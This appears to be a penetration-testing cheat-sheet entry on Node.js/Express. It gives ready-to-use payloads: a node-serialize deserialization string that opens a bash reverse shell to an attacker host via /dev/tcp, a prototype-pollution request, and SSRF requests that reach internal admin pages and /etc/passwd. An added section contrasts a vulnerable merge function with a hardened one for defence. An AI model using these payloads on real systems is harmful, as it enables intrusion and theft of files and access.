Node.js / Express

What it is: JavaScript runtime (Node.js) with Express as the most popular web framework. Deserialization attacks, prototype pollution, and SSRF are the primary vulnerability classes to test for. Look for the X-Powered-By: Express header.

Default ports: 3000, 8080, 8443

Vuln research:


Detect Node.js

Headers and error pages reveal the framework

curl -sI http://$IP/ | grep -i "x-powered-by"
# "X-Powered-By: Express" = Node.js/Express

Node.js deserialization RCE

Unsafe unserialize() — RCE via crafted cookie or input

# If the app uses node-serialize, craft IIFE payload:
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('bash -i >& /dev/tcp/$LHOST/4444 0>&1')}()"}
# Base64 encode and inject into vulnerable cookie/parameter

Prototype pollution

Modify Object.prototype — Can lead to RCE or auth bypass

curl -X POST http://$IP/api -H "Content-Type: application/json" -d '{"__proto__":{"admin":true}}'
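
Added example, not from the original page: the kind of recursive deep-merge helper that the __proto__ body above abuses, beside a hardened version, plus a small self-check that shows whether Object.prototype was polluted. The function names and the sample body are constructed for this illustration, and the body is assumed to arrive already parsed by a JSON body parser such as express.json().

```javascript
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
// Vulnerable: JSON.parse yields an own "__proto__" key, target["__proto__"]
// resolves to Object.prototype, and the recursion writes "admin" onto it.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: drop prototype-reaching keys and recurse only into own properties.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || target[key] === null || typeof target[key] !== 'object') target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed request body: the cheat sheet's payload plus a legitimate field.
const BODY = '{"__proto__":{"admin":true},"name":"alice"}';
// Merge BODY into a fresh profile and report whether an unrelated object
// inherited "admin". Polluted keys show up as enumerable own properties of
// Object.prototype (a cheap self-check); the pollution is undone afterwards.
function demo(mergeFn) {
  const profile = mergeFn({ name: '' }, JSON.parse(BODY));
  const unrelated = {};
  const report = {
    profileName: profile.name,
    unrelatedAdmin: unrelated.admin === true,
    pollutedKeys: Object.keys(Object.prototype),
  };
  delete Object.prototype.admin;
  return report;
}

console.log(demo(unsafeMerge), demo(safeMerge));
```

Node's --disable-proto=delete flag removes the Object.prototype.__proto__ accessor, which closes the __proto__ path shown here but not the constructor.prototype path, so key filtering in the merge is still required.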

SSRF in Node.js

Server-side request forgery — Access internal services

curl "http://$IP/fetch?url=http://127.0.0.1:3000/admin"
curl "http://$IP/fetch?url=file:///etc/passwd"